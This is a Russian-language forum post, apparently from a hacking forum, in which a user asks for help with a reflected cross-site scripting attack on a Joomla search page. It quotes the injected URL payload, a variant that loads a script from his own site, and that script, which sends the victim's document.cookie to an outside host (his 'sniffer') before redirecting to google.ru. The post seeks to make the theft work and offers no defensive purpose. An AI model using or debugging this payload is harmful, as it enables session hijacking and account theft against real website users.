Показать сообщение отдельно

  #20952  
Старый 08.07.2012, 01:58
p1rotexn1k
Guest
Сообщений: n/a
Провел на форуме:
1377

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://attacker.in/joomla1015/index.php?option=com_search&searchword=xss&searchp hrase=any&ordering=newest%22%20onmousemove=alert%2 8document.cookie%29%20style=position:fixed;top:0;l eft:0;width:100%;height:100%;%22
нашел пассивку вместо alert%28document.cookie%29 вставил

type=text/javascript%20src=http://мойсайт.org/script.js

Разные варианты пробовал, но все-ровно не приходят куки на сниффер, подскажите что не так, а то заколебался.

сам script.js

Цитата:
Сообщение от None  
location.href = "http://хостorg/s.gif?" + document.cookie;
location.href = "http://google.ru/"
 
Ответить с цитированием